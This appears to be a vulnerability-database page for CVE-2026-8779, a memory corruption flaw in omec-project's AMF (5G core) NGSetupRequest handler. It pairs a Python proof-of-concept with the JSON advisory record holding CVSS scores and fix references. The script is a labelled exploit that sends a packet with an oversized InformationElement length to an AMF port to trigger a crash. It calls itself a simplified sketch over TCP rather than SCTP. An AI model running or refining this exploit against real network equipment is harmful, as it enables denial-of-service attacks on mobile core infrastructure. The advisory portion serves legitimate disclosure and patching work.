CVE-2026-8779

import socket import struct # Conceptual PoC for CVE-2026-8779 # Description: Sends a malformed packet to trigger InformationElement parsing issue in NGSetupRequest. # Note: This is a simplified demonstration. Real NGAP traffic runs over SCTP. TARGET_IP = "192.168.1.100" TARGET_PORT = 38412 # Example AMF port def create_malformed_packet(): # Simulating an NGAP PDU with a crafted InformationElement length # that triggers the memory corruption in ngap/handler.go # Header placeholder (simplified) header = b"\x00\x00\x00\x01" # Malformed InformationElement length field (e.g., extremely large value) # causing buffer overflow or allocation failure bad_length = struct.pack('>I', 0xFFFFFFFF) # Padding or payload content payload = b"\x41" * 50 return header + bad_length + payload def send_exploit(): try: print(f"[*] Sending exploit to {TARGET_IP}:{TARGET_PORT}...") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) s.connect((TARGET_IP, TARGET_PORT)) packet = create_malformed_packet() s.send(packet) print("[+] Packet sent. Check target for crash/memory corruption.") s.close() except Exception as e: print(f"[-] Error occurred: {e}") if __name__ == "__main__": send_exploit()

{"cve": {"id": "CVE-2026-8779", "sourceIdentifier": "[email protected]", "published": "2026-05-18T02:16:37.180", "lastModified": "2026-05-18T02:16:37.180", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in omec-project amf up to 2.1.3-dev. Impacted is the function NGSetupRequest of the file ngap/handler.go. Executing a manipulation of the argument InformationElement can lead to memory corruption. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. Upgrading to version 2.2.0 is recommended to address this issue. The affected component should be upgraded. The same pull request fixes multiple security issues."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}]}], "references": [{"url": "https://github.com/omec-project/amf/", "source": "[email protected]"}, {"url": "https://github.com/omec-project/amf/issues/671", "source": "[email protected]"}, {"url": "https://github.com/omec-project/amf/pull/666", "source": "[email protected]"}, {"url": "https://github.com/omec-project/amf/releases/tag/v2.2.0", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/811616", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/364403", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/364403/cti", "source": "[email protected]"}]}}